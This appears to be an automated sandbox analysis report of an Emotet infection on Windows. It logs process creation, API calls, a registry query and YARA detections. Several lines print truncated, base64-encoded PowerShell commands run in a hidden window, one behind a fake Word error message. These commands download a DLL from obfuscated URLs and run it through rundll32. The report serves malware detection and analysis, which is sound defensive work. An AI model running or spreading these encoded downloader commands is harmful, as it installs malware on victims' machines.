JwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 0000000B.00000002.2104461658.0000000000251000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2097868806.0000000000201000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2102162180.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2100838145.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2104434238.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2107224679.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2109356030.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2097792177.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2102227386.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2346608733.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2105642639.0000000000201000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2107394819.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2105597676.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2110979114.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2109268872.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2346635029.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2099576537.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2100056068.0000000000701000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2100874845.00000000001A1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2111023949.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
